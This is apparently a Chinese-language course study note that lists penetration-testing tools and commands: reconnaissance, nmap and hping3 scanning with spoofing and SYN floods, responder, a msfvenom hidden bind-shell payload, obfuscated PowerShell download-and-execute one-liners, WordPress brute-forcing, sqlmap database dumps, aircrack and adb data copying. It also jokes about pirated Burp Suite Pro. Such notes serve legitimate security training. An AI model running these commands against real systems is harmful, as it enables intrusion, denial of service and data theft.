<!-- {%hackmd BJrTq20hE %} -->
<!-- {%hackmd sMV2zv-CTsuIqnpb0hZLmA %} -->
<!-- {%hackmd @themes/dracula %} -->
::: info
這份筆記是課堂上講師有demo過的"工具"
系統內建指令、操作該筆記無紀錄
基本常用到爛掉的工具也不再此贅述
:::
:::spoiler ls -al
[toc]
:::
# Reconnaissance Techniques
## footprinting reconnaissance
### [netcraft](https://sitereport.netcraft.com/?url=)
### **theHarvester**
```bash
theHarvester -d DOMAIN_NAME -l PORT_NUMBER -b (search engine)
```
### [web history](https://archive.org/)
### **whois**
```bash
whois DOMAIN_NAME
```
### **traceroute**
```bash
traceroute DOMAIN_NAME
```
### **Recon-ng framework**
```bash
recon-ng marketplace install all
```
Marketplace search
```bash
recon-ng][default] >marketplace search ssl
```
more inf
```bash
[recon-ng][default] > marketplace info ssltools
```
Load module
```bash
[recon-ng][default] > modules load hackertarget
[recon-ng][default][hackertarget] >
```
Set source
```bash
[recon-ng][default][hackertarget] > show options
```
set the source to the name of the domain
```bash
[recon-ng][default][hackertarget] > options set SOURCE tesla.com
SOURCE => tesla.com
```
Use command info. This shows current value has changed to tesla.com
```bash
[recon-ng][default][hackertarget] > info
```
Use input to see
```bash
[recon-ng][default][hackertarget] > input
```
Run the module
```bash
[recon-ng][default][hackertarget] > run
```
Show hosts
```bash
[recon-ng][default][hackertarget] > show hosts
```
### **whatweb**
```bash
whatweb DOMAIN_NAME
```
### [OSINT map](https://osintframework.com/)
## scanning netwalk
### **hping3**
| 功能 | 指令 | 說明 |
|-----------------------|------------------------------------------------------------------------------------|--------------------------------------------------------------------|
| Ping 類似功能 | `hping3 -1 <目標IP>` | 使用 ICMP echo 請求對目標進行 ping 測試。 |
| SYN 掃描 | `hping3 -S <目標IP> -p <目標端口範圍>` | 執行 TCP SYN 掃描,檢查哪些端口開放。 |
| 指定源 IP 地址 | `hping3 -a <偽造的源IP> -S <目標IP> -p <目標端口>` | 使用偽造的源 IP 地址發送 SYN 包。 |
| UDP 掃描 | `hping3 -2 <目標IP> -p <目標端口>` | 對指定端口發送 UDP 包。 |
| TRACEROUTE | `hping3 --traceroute -V -1 <目標IP>` | 執行類似 `traceroute` 的操作。 |
| Flood 攻擊測試 | `hping3 -S <目標IP> -p <目標端口> --flood` | 向目標端口發送大量 SYN 包進行洪水攻擊測試。 |
| 指定封包大小 | `hping3 -S <目標IP> -p <目標端口> -d <封包大小>` | 指定封包大小(以字節為單位)。 |
| 發送特定數量的封包 | `hping3 -S <目標IP> -p <目標端口> -c <封包數量>` | 發送指定數量的封包。 |
| 發送特定的 TCP 標誌 | `hping3 -F -P -U <目標IP> -p <目標端口>` | 發送帶有 FIN、PUSH 和 URG 標誌的 TCP 封包。 |
### **nmap**
| Nmap flag | 說明 |
|----------------------------|-------------------------------------------------------------------------------------------|
| -sV | 使用此標誌可以獲得服務版本資訊,有助於進一步的漏洞掃描。 |
| -p <x> or -p- | 指定特定端口或掃描所有端口,可以快速聚焦於目標服務。 |
| -Pn | 當目標主機可能阻止 ping 時使用此標誌,可以強制掃描端口。 |
| -A | 綜合性掃描,包括操作系統偵測和版本偵測,以及執行預設腳本,非常適合進行全面的評估。 |
| -sC | 結合預設腳本快速獲取常見漏洞和配置信息,適合快速初步評估。 |
| -v | 提供詳細的掃描過程資訊,有助於了解掃描進度及診斷問題。 |
| -sU | 掃描 UDP 端口,識別不常見的服務,適合全面的網絡評估。 |
| -sS | 半開放掃描,快速且隱蔽,適合在大量端口掃描時使用。 |
| \--top-ports <N> | 快速掃描最常見的 N 個端口,節省時間並獲取關鍵資訊。 |
| \--script <script-name> | 使用特定的 Nmap 腳本進行自定義掃描,可針對特定漏洞或配置進行檢查。 |
| -oA <output-basename> | 將結果保存為多種格式,便於後續分析和報告。 |
| -T4 | 加快掃描速度,適合在局域網或掃描時間有限的情況下使用。 |
-D RND:(n) | 偽造n個來源ip
\--spoof-mac 0 |偽造MAC
## enumeration
### nmap萬用工具
```bash
locate *(ENUM_protocol)*.nse
nmap --script=
```
### snmp-check (161 port open)
```bash
snmp-check DOMAIN_NAME
```
### smtp (25 port open)
```bash
smtp (-f smtp-ips.txt)/(-h HOST) -e /usr/share/wordlists/metasploit/unix_users.txt
```
#### enum4linux (445 port open)
```bash
enum4linux ip_addres
````
# System Hacking Phases and Attack Techniques
## vulnerability analysis
### [NVD](https://nvd.nist.gov/vuln/search)
### [CWE](https://cwe.mitre.org/)
### OpenVAS / GVM (software)
### nikto (for web "server")
```bash
nikto -h ip_addres
```
## system hacking
### responder
```bash!
responder -I eth0 -wrf
```
### msfvenom
```bash
msfvenom -p windows/shell_hidden_bind_tcp ahost=IP_ADDRES lport=PORT_NUMBER -f exe > spy.exe
```
## malware threats
**obfuscation**
```
,;cmd.exe,/c,;,echo;powershell.exe -NoExit -exec bypass -nop Invoke-Expression(New-Object System.Net.WebClient).DownloadString(‘https://targetwebsite.com”)&&echo,exit
```
```
C:\WINDOWS\system32\cmd.exe /c p^^o^^w^^e^^r^^s^^h^^e^^l^^l^^.^^e^^x^^e -No^^Exit -exec bypass -nop Invoke-Expression (New-Object System.Net.WebClient). DownloadString((‘https://targetwebsite.com”)&&echo,exit
```
**analysis**
### [anyrun](https://any.run/)
### [virustotal](https://www.virustotal.com/gui/home/upload)
### [PeStudio](https://www.winitor.com/download)
### [Tcpview](https://learn.microsoft.com/zh-tw/sysinternals/downloads/tcpview)
# Network and Perimeter Hacking
## sniffing
**MAC Flooding**
### macof
```bash
sudo macof
```
## social engineering
### setoolkit
```bash
setoolkit
```
## denial-fo-service
### hping3
```bash
hping3 --flood --rand-source -S -p 80 DOMAIN_NAME
```
### [LOIC](https://sourceforge.net/projects/loic/)
## session hijacking
### [hunt](https://packetstormsecurity.com/files/download/21968/hunt-1.5bin.tgz)
```bash
parrot@G:~/hunt-1.5$ sudo ./hunt
/*
* hunt 1.5
* multipurpose connection intruder / sniffer for Linux
* (c) 1998-2000 by kra
*/
starting hunt
--- Main Menu --- rcvpkt 0, free/alloc 63/64 ------
l/w/r) list/watch/reset connections
u) host up tests
a) arp/simple hijack (avoids ack storm if arp used)
s) simple hijack
d) daemons rst/arp/sniff/mac
o) options
x) exit
->
```
## evading IDS firewalls honeypots
紙上談兵
# Web Application Hacking
## Hacking web server
### whatweb
```bash!
whatweb -v DOMAIN_NAME
```
### netcat
```bash
nc -vv DOMAIN_NAME
```
### nikto
```bash
nikto -h DOMAIN_NAME
```
### gobuster
```bash
gobuster dir -u URL -w WORDLIST
```
## hacking web application
### wafw00f
```bash
wafw00f DOMAIN_NAME
```
**wordpress login attack**
### burpsuitepro
至於pro哪來的呵!
搞資安的自己想🙃
### msfconsole
```bash
msf6 auxiliary(scanner/http/wordpress_login_enum) > options
Module options (auxiliary/scanner/http/wordpress_login_enum):
Name Current Setting Required Description
---- --------------- -------- -----------
ANONYMOUS_LOGIN false yes Attempt to login with a blank username and password
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE true yes Perform brute force authentication
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (Accepted: none, user,
user&realm)
ENUMERATE_USERNAMES true yes Enumerate usernames
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RANGE_END 10 no Last user id to enumerate
RANGE_START 1 no First user id to enumerate
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics
/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
TARGETURI / yes The base path to the wordpress application
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VALIDATE_USERS true yes Validate usernames
VERBOSE true yes Whether to print output for all attempts
VHOST no HTTP server virtual host
```
## sql injection
### sqlmap
```bash
sqlmap -u URL --dbs
sqlmap -u URL -D DBNAME --tables
sqlmap -u URL -D DBNAME -T TBNAME --dump
```
# Wireless Network Hacking
## hacking wireless networks
### aircrack-ng
```bash
aircrack-ng FILE
```
```bash!
aircrack-ng -w WORDLIST FILE
```
# Mobile Platform, IoT, and OT Hacking
## hacking mobile platforms
### adb
```bash
adb connect IP_ADDRES:PORT
adb-s IP_ADDRES:PORT shell
```
```bash
scp -r /data USER@IP_ADDRES:/work
```
## IoT OT hacking
理論
# Cloud Computing
## cloud computing
理論
# Cryptography
## crytography
**one way hash**
```bash!
echo 123 > file
sha1sum file
```
Sign in with Wallet
Connect another wallet